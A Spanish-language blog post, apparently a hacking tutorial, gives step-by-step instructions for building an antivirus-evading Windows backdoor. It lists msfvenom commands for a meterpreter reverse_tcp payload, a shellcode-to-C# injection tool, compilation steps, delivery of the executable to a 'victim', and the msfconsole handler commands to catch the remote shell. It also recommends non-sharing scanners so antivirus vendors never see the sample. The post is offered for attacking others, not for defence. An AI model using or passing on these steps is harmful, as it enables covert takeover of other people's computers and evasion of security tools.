El otro día estaba jugando con un backdoor que era indetectable para todos los antivirus pero como hay personas que escanean el virus antes de usarlo al ataque, en algunos casos personas cometen el error de publicarlo en “VIRUSTOTAL”. Recuerda que es una empresa que reporta virus y lo compra a las compañías de antivirus .
Ahora te voy a dejar dos paginas donde puedes scanearlo y que no sea compartido para esas compañías de antivirus.
Aquí puedes encontrar esta pagina se llama https://virusscan.jotti.org
Tienes otra compañía que también lo hace. http://nodistribute.com
Este método vamos a combinar windows 7 con Kali Linux 2016.1 como ya saben vamos atacar windows 10.
Porque windows 7? porque vamos a compilar un .bin a .cs en el cual vamos a utilizar una pequeña herramienta que se necesita tener net framework AQUÍ
Porque windows 7? porque vamos a compilar un .bin a .cs en el cual vamos a utilizar una pequeña herramienta que se necesita tener net framework AQUÍ
Primero vamos crear el backdoor en código binario con extensión .bin.
Vamos a nuestra terminal de KALI LINUX 2016.1
msfvenom -p windows/meterpreter/reverse_tcp lhost=(IP) lport=(PUERTO)4444 -t raw -o /root/Desktop/example.bin
En este caso lo guarde en Escritorio y vamos a usar SimpleHTTPServer para transportar el archivo.
python -m SimpleHTTPServer 8080
Con la ubicación de la herramienta vamos a transportar el archivo y vamos transformarlo en .cs
vamos a descargar el archivo aquí
vamos a descargar el archivo aquí
Al Descargar el archivo lo vamos a descomprimir y vamos a usar la herramienta.
En mi caso lo tengo en la carpeta de descarga. Ejemplo
cd /user/CreadPag/Download/hanzoInjection-master
Y ejecutamos el .exe desde la terminal aclaro que tienen que colocar el archivo creado example.bin en la misma carpeta donde corre el programa.
HanzoInjection.exe -p example.bin -o injection_memory.cs
Ahora vamos compilar el archivo .cs en Kali Linux pueden seguir en windows usando Visual Studio o seguimos en kali.
Tenemos que descargar un programa llamado MonoDevelop
Tenemos que descargar un programa llamado MonoDevelop
apt-get install monodevelop
Lo descargamos para poder compilar el archivo .cs y al terminal nos ofrezca el archivo en .exe
Ahora vamos a abrir el programa
Ahora vamos a abrir el programa
Creamos un nuevo proyecto en mi caso vamos a NET- Console Proyect. C#
Borramos el código del proyecto y copiamos el código del archivo .cs
Lo vamos a compilar y nos muestra dos enormes errores pero tranquilo vamos a solucionarlo.
Vamos a Proyect- General- al final dice “Allow ‘unsafe’ code” vamos a seleccionarlo.
Segundo error para la solución.
Vamos a Referencia editar y vamos al final a buscar “System.Xml” y aceptamos.
Ahora el programa va a compilar y nos ha creado una archivo .exe
Ahora simplemente vamos a enviar el archivo a la victima de Windows 10 y vamos a la consola de meterpreter.
Como ya sabes el mismo procedimiento.
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set lport (PUERTO) 4444
exploit
La victima le va a ejecutar el programa y simplemente no le abrirá pero nosotros vamos a capturar todo.
Como les repito siempre combinando muchos sistemas puedes armar una gran arma y recuerda “VIRUSTOTAL” es tu enemigo en el caso que programes backdoor.
Si te gusto me ayudarías a compartirlo y darte una visitar a mi canal de YouTube:
No hay comentarios.:
Publicar un comentario